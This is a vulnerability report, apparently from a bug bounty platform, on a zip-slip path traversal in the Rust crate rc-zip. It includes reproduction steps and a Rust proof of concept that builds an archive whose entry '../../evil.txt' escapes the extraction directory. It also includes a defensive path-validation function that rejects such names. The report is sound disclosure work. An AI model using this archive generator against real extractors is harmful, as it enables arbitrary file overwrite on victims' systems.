Path Traversal in rust-compress/rc-zip
Valid
Reported on
Feb 7th 2021
:book: Description
rc-zip
rc-zip is a pure Rust zip and zip64 reader and writer. It is vulnerable to zip-slip: on extraction, an entry's name is joined onto the output directory as-is, so an archive entry whose name contains `..` components (or an absolute path) is written outside the directory the user chose.
https://github.com/rust-compress/rc-zip https://crates.io/crates/rc-zip
:recycle: Steps To Reproduce:
- clone the repository and build it; the build also produces the `jean` sample CLI from samples/jean under target/debug:
  git clone https://github.com/rust-compress/rc-zip
  cd rc-zip
  cargo build
- extract a zip-slip archive (slip.zip: an entry whose name contains `../` components) and observe that the file is written outside the current directory:
  ./target/debug/jean unzip slip.zip
:telescope: POC
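The slip.zip attached to the original report is not reproduced on this page. As an added example (not the reporter's file and not rc-zip's own code), the Rust program below builds an equivalent archive from scratch: one STORED entry whose name is `../../evil.txt`, with a hand-written local header, central directory and end-of-central-directory record, so no external crate is needed. It also includes `safe_target`, the lexical check an extractor such as `jean unzip` should apply before joining an entry name onto the destination; the entry names and the `/tmp/out` destination are constructed for the demo.

```rust
use std::fs::File;
use std::io::Write;
use std::path::{Component, Path, PathBuf};

/// CRC-32 (IEEE, reflected), the checksum stored in zip headers.
fn crc32(data: &[u8]) -> u32 {
    let mut crc = 0xFFFF_FFFFu32;
    for &b in data {
        crc ^= b as u32;
        for _ in 0..8 {
            crc = (crc >> 1) ^ (0xEDB8_8320 & (crc & 1).wrapping_neg());
        }
    }
    !crc
}

fn le16(out: &mut Vec<u8>, v: u16) { out.extend_from_slice(&v.to_le_bytes()); }
fn le32(out: &mut Vec<u8>, v: u32) { out.extend_from_slice(&v.to_le_bytes()); }

/// Build a minimal, spec-valid zip (one STORED entry, no zip64, no extra
/// fields). The entry name is written verbatim, so it can be "../../evil.txt".
fn build_zip(entry_name: &str, payload: &[u8]) -> Vec<u8> {
    let name = entry_name.as_bytes();
    let (crc, size) = (crc32(payload), payload.len() as u32);
    let mut out = Vec::new();

    // Local file header: PK\x03\x04, version needed 2.0, flags, method 0 (stored),
    // DOS time, DOS date, CRC, compressed size, uncompressed size, name len, extra len.
    le32(&mut out, 0x0403_4b50);
    for &v in &[20u16, 0, 0, 0, 0] { le16(&mut out, v); }
    le32(&mut out, crc); le32(&mut out, size); le32(&mut out, size);
    le16(&mut out, name.len() as u16); le16(&mut out, 0);
    out.extend_from_slice(name);
    out.extend_from_slice(payload);

    // Central directory header: PK\x01\x02, version made by, version needed, flags,
    // method, time, date, CRC, sizes, name/extra/comment lengths, disk start,
    // internal attrs, external attrs, offset of the local header (0), then the name.
    let cd_offset = out.len() as u32;
    le32(&mut out, 0x0201_4b50);
    for &v in &[20u16, 20, 0, 0, 0, 0] { le16(&mut out, v); }
    le32(&mut out, crc); le32(&mut out, size); le32(&mut out, size);
    for &v in &[name.len() as u16, 0, 0, 0, 0] { le16(&mut out, v); }
    le32(&mut out, 0); le32(&mut out, 0);
    out.extend_from_slice(name);
    let cd_size = out.len() as u32 - cd_offset;

    // End of central directory: PK\x05\x06, this disk, CD disk, entries on this
    // disk, total entries, CD size, CD offset, comment length.
    le32(&mut out, 0x0605_4b50);
    for &v in &[0u16, 0, 1, 1] { le16(&mut out, v); }
    le32(&mut out, cd_size); le32(&mut out, cd_offset); le16(&mut out, 0);
    out
}

/// The join a safe extractor needs: compute where `entry_name` lands under
/// `dest` from the name's components alone, refusing anything that can escape.
/// The check is lexical because the target does not exist yet, so canonicalize()
/// is unusable; `\` is refused because Windows treats it as a separator even
/// where this code sees an ordinary character.
fn safe_target(dest: &Path, entry_name: &str) -> Option<PathBuf> {
    if entry_name.is_empty() || entry_name.contains('\\') || entry_name.contains('\0') {
        return None;
    }
    let mut target = dest.to_path_buf();
    for c in Path::new(entry_name).components() {
        match c {
            Component::Normal(part) => target.push(part),
            Component::CurDir => {}
            // "..", a leading "/", or a Windows drive/UNC prefix all escape `dest`.
            Component::ParentDir | Component::RootDir | Component::Prefix(_) => return None,
        }
    }
    Some(target)
}

fn main() -> std::io::Result<()> {
    // Constructed PoC: one entry that climbs two levels above the extraction dir.
    let zip = build_zip("../../evil.txt", b"pwned\n");
    File::create("slip.zip")?.write_all(&zip)?;
    println!("wrote slip.zip ({} bytes)", zip.len());
    let dest = Path::new("/tmp/out"); // hypothetical extraction directory
    for &name in &["../../evil.txt", "/etc/passwd", "a\\..\\b", "docs/readme.md"] {
        println!("{:?} -> {:?}", name, safe_target(dest, name));
    }
    Ok(())
}
```

Running the program writes slip.zip into the current directory; feeding that file to an extractor that joins names blindly creates evil.txt two levels above the output directory, while `safe_target` returns `None` for every escaping name and only yields a path for `docs/readme.md`. Rejecting bad entries outright, rather than stripping the `..` components, is the right fix: silently rewriting a hostile name hides the attack from the user.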
💥 Impact
Arbitrary file write and overwrite outside the extraction directory, with the privileges of the process that extracts the attacker-supplied archive.